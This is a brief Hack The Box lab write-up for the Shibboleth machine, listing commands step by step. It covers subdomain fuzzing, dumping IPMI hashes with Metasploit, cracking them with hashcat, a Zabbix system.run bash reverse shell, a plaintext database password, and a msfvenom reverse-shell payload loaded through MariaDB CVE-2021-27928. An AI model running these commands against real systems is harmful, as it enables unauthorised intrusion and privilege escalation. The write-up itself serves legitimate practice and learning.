Hack the Box : Shibboleth

Hack The Box

Multiple vulnerabilities.

There’s so many things included, spent many hours working on things did not lead to flags.

Still, everything is enlightening.

00:30 feroxbuster

feroxbuster -u http://shibboleth.htb/ --force-recursion -C 404,405 -m GET,POST

00:48 wfuzz for sub domains

wfuzz -u http://shibboleth.htb/ -H "Host: FUZZ.shibboleth.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hw 26

Added –hw 26, as there’s too many Word 26 thing.

01:06 Search for Bare Metal BMC automation

reference is here and here

Restrict IPMI traffic to trusted internal networks. Traffic from IPMI (usually UDP port 623) should be restricted to a management VLAN segment with strong network controls. Scan for IPMI usage outside of the trusted network and monitor the trusted network for abnormal activity.

sudo nmap -sU -p 623  shibboleth.htb

01:28 IPIM version exploit with Metasploit

reference here

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

01:34 IPMI vulnerability 

reference here

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > show actions
msf auxiliary(ipmi_dumphashes) > set ACTION < action-name >
msf auxiliary(ipmi_dumphashes) > show options
    ...show and set options...
msf auxiliary(ipmi_dumphashes) > run

01:48 hashcat to crack password

hashcat hashed_pass.txt /usr/share/wordlists/rockyou.txt

02:15 zabbix admin page. Found command exec func.

reference here

03:16 reverse shell

system.run[bash -c 'bash -i >& /dev/tcp/ 0>&1' ,nowait]

04:09 zabbix config file

cat zabbix_server.conf | grep -v "^#" | grep .

04:18 MariaDB version related vulnerability 

mysql -u zabbix -pbloooarskybluh

Reference here

# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=9999 -f elf-so -o CVE-2021-27928.so
# Execute the payload
mysql -u zabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'